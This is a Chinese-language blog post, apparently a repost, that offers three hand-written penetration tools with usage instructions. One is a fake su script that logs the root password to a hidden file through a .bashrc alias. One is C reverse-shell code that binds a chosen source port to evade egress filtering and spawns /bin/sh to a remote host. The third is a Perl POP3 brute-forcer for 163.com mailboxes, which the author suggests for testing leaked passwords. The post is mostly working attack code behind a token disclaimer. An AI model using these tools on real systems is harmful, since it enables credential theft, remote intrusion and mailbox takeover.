Python 官方文档:入门教程 => 点击学习
渗透的很多时候,在网上找到的工具并不适用,自己写代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的红黑联盟,短小使用,求欣赏,求好评。 0×01 记录root密码小工具: root.py
渗透的很多时候,在网上找到的工具并不适用,自己写代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的红黑联盟,短小使用,求欣赏,求好评。
0×01
记录root密码小工具:
root.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
#!/usr/bin/pythonimport
os, sys, getpass, timecurrent_time
= time.strftime("%Y-%m-%d
%H:%M")logfile="/dev/shm/.su.log"
//密码获取后记录在这里#fail_str
= "su:
Authentication failure"#For
linux Korea //centos,ubuntu,korea
切换root用户失败提示不一样fail_str
= "su:
incorrect password"try: passwd
= getpass.getpass(prompt='Password:
'); file=open(logfile,'a') file.write("[%s]t%s"%(passwd,
current_time)) //截取root密码 file.write('n') file.close()except: passtime.sleep(1)print
fail_str //打印切换root失败提示 |
打印切换root失败提示
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
0×02
设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,
Ping了下百度 可以ping通,
那真相只有一个
服务器变态的限制了只能某些提供已某些端口为源端口去连接外面
比如
只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
#include
<stdio.h>#include
<sys/types.h>#include
<sys/Socket.h>#include
<netinet/in.h>#include
<netdb.h>void
error(char
*msg){ perror(msg); exit(0);}{ int
sockfd, portno, lportno,n; struct
sockaddr_in serv_addr; struct
sockaddr_in client_addr; struct
hostent *server; char
buffer[256]; if
(argc < 3)
{ fprintf(stderr,"usage
%s hostname port LocalPortn",
argv[0]); exit(0); }
//三个参数,目标主机,目标主机端口,本地源端口 portno
= atoi(argv[2]); sockfd
= socket(AF_INET, SOCK_STREAM, 0); if
(sockfd < 0) error("ERROR
opening socket"); bzero((char
*) &client_addr, sizeof(client_addr)); lportno
= atoi(argv[3]); client_addr.sin_family
= AF_INET; client_addr.sin_addr.s_addr
= INADDR_ANY; client_addr.sin_port
= htons(lportno); //设置源端口 if
(bind(sockfd, (struct sockaddr *) &client_addr, sizeof(client_addr))
< 0) error("ERROR
on binding"); server
= gethostbyname(argv[1]); if
(server == NULL) { fprintf(stderr,"ERROR,
no such host "); exit(0); } bzero((char
*) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family
= AF_INET; bcopy((char
*)server->h_addr, (char
*)&serv_addr.sin_addr.s_addr, server->h_length); serv_addr.sin_port
= htons(portno); if
(connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0)
//连接 error("ERROR
connecting"); dup2(fd,
0); dup2(fd,
1); dup2(fd,
2); execl("/bin/sh","sh
-i",
NULL); //执行shell
close(fd);
} |
用法:
1 gcc client-port.c -o
port 1 chmod
+x port 1 ./port
你的IP 你的监听端口 本地的源端口
如 ./port Http://www.2cto.com 80 80
红黑联盟成功反弹shell 提权成功
0×03 邮箱爆破脚本
某个时候 需要爆破一批邮箱
Burp163.pl
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
#!/usr/bin/perluse
Net::POP3;$email="pop.163.com";
//设置pop服务器地址
qq为pop.qq.com$pop
= Net::POP3->new($email)or
die("ERROR:
Unable to initiate. ");print
$pop->banner();$pop->quit;$i=0;open(fp1,"user.txt");
@array1=<fp1>;open(fp2,"pass.txt");@array2=<fp2>;
//从文件中获取邮箱用户名及密码foreach
$a(@array1)
{$u=substr($a,0,length($a)-1);$u=$u."@163.com";foreach
$b(@array2)
{$p=substr($b,0,length($b)-1);print
"cracked
with ".$u."-----".$p."n";$i=$i+1;$pop
= Net::POP3->new($email)or
die("ERROR:
Unable to initiate. ");$m=$pop->login($u,$p);
//尝试登录邮箱if($m>0){ print
$u."------------".$p."----"."success"."n"; $pop->quit;}
//成功登录else{ print
$u."------------".$p."----"."failed"."n"; $pop->quit;
//登录失败}}}print
$i; |
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
$email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如sude@163.com 去除后sude存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说
这个有点鸡肋吧 万一邮箱的密码很复杂
呵呵
搞到了一个小站的数据,
用这个程序批量测试密码是否就是邮箱密码 呵呵
我啥都没说。
0×04
这三个程序仅供技术研究,如读者用于违法行为,本人概不负
--结束END--
本文标题: 入侵渗透专用的python小脚本
本文链接: https://www.lsjlt.com/news/190730.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-03-01
2024-03-01
2024-03-01
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
官方手机版
微信公众号
商务合作
0